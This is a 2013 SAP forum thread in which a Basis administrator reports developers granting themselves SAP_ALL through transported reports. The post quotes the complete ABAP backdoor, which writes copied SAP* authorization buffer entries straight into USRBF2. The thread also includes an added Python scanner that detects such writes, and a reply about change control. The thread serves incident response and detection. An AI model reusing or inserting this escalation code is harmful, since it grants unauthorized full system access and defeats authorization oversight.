03-28-2013 1:32 PM
Dear experts,
Over the last few days we, as the Basis team, have observed that some of our ABAP programmers are getting SAP_ALL authorization in the production or quality system using non-standard methods. The procedure for getting SAP_ALL goes like this: they change (or add) any Z (Y) reports in the development system. After this, using the transport system, the changed program code goes to the quality and production systems. On starting the newly transported report, the user temporarily gets SAP_ALL authorization.
We have found and deleted this piece of code from the report, but we do not know how to disable this absolutely.
Please help us with how to restrict code like this in future.
Below you can find a piece of this code and a link where this procedure is described:
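" Internal table with the same structure as the authorization buffer table USRBF2
DATA zusrbf2 LIKE usrbf2 OCCURS 0 WITH HEADER LINE.
" List of user names that should receive the copied entries
DATA: BEGIN OF it OCCURS 0
    , uname LIKE sy-uname
    , END OF it.

CLEAR : it.
it-uname = 'USER-1'.
APPEND it.
it-uname = 'USER-2'.
APPEND it.
it-uname = 'USER-3'.
APPEND it.

LOOP AT it.
  " Cross-client read of the SAP* / &_SAP_ALL entries from client 000
  SELECT * FROM usrbf2 CLIENT SPECIFIED
    INTO TABLE zusrbf2
    WHERE mandt = '000'(001) AND
          bname = 'SAP*'(002) AND
          auth = '&_SAP_ALL'(003).
  IF sy-subrc NE 0.
    EXIT.
  ENDIF.
  " Rewrite the owner of each copied entry (internal table only)
  LOOP AT zusrbf2.
    zusrbf2-bname = it-uname.
    MODIFY zusrbf2 INDEX sy-tabix TRANSPORTING bname.
  ENDLOOP.
  " Direct database write into USRBF2, bypassing user administration
  INSERT usrbf2 FROM TABLE zusrbf2 ACCEPTING DUPLICATE KEYS.
ENDLOOP.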
(link where this procedure is explained in detail)
http://zodano.wordpress.com/2009/05/06/sap-secret-skip-sap-authority-check/
Thanks in advance
Shahin
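One way to catch reports like the one above before they are transported, as an added example that is not part of the original post: a small static scan that flags Open SQL writes to, and cross-client reads of, user and authorization tables. It assumes the Z/Y report source is available as plain text; the watchlist beyond USRBF2 and all function names are illustrative.

```python
import re

# Assumption: watchlist of user-master/authorization tables. USRBF2 is the
# table written by the report in the post; the others are added for illustration.
WATCHED = {"USRBF2", "USR02", "USR04", "UST04", "AGR_USERS"}
WRITE_VERBS = {"INSERT", "UPDATE", "MODIFY", "DELETE"}

def statements(source):
    """Yield (first_line_no, upper-cased statement) without comments/literals."""
    buf, start = [], None
    for no, line in enumerate(source.splitlines(), 1):
        if line.startswith("*"):                 # full-line ABAP comment
            continue
        line = re.sub(r"'[^']*'", "''", line)    # blank out character literals
        line = line.split('"', 1)[0]             # drop inline comment
        for part in re.split(r"(\.)", line):     # a period ends a statement
            if part == ".":
                if buf:
                    yield start, " ".join(" ".join(buf).upper().split())
                buf, start = [], None
            elif part.strip():
                if start is None:
                    start = no
                buf.append(part)

def scan(source):
    """Return (line, kind, table) findings for access to watched tables."""
    findings = []
    for no, stmt in statements(source):
        tok = stmt.split()
        if tok[0] in WRITE_VERBS:
            # Target follows the verb, or an optional INTO / FROM keyword
            i = 2 if len(tok) > 2 and tok[1] in ("INTO", "FROM") else 1
            target = tok[i] if len(tok) > i else ""
            if target in WATCHED:
                findings.append((no, "direct-write", target))
        elif tok[0] == "SELECT" and "CLIENT SPECIFIED" in stmt:
            for table in sorted(WATCHED.intersection(tok)):
                findings.append((no, "cross-client-read", table))
    return findings

# Constructed sample, condensed from the report quoted in the post
SAMPLE = """\
DATA zusrbf2 LIKE usrbf2 OCCURS 0 WITH HEADER LINE.
SELECT * FROM usrbf2 CLIENT SPECIFIED
  INTO TABLE zusrbf2
  WHERE mandt = '000'(001) AND bname = 'SAP*'(002) AND auth = '&_SAP_ALL'(003).
MODIFY zusrbf2 INDEX sy-tabix TRANSPORTING bname.
INSERT usrbf2 FROM TABLE zusrbf2 ACCEPTING DUPLICATE KEYS.
"""
```

The scan matches static table names only; dynamic `(tabname)` targets and colon-chained statements are not covered and need separate review.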
03-28-2013 8:29 PM
That is very naughty of them, but the code is very ugly. Badly commented and much too long...
You need to consider whether this behaviour is a problem with the fact that the role and user administration SLA delivery does not support the development support requirements, or, whether this is the developers begging to be fired.
Note that if they were creating Z-reports with this authorization instead of transporting, then there is more of this rubbish in the system.
Basically... you will have to get change management back under control before the developers screw up the whole landscape and then only code in production in future...
Cheers,
Julius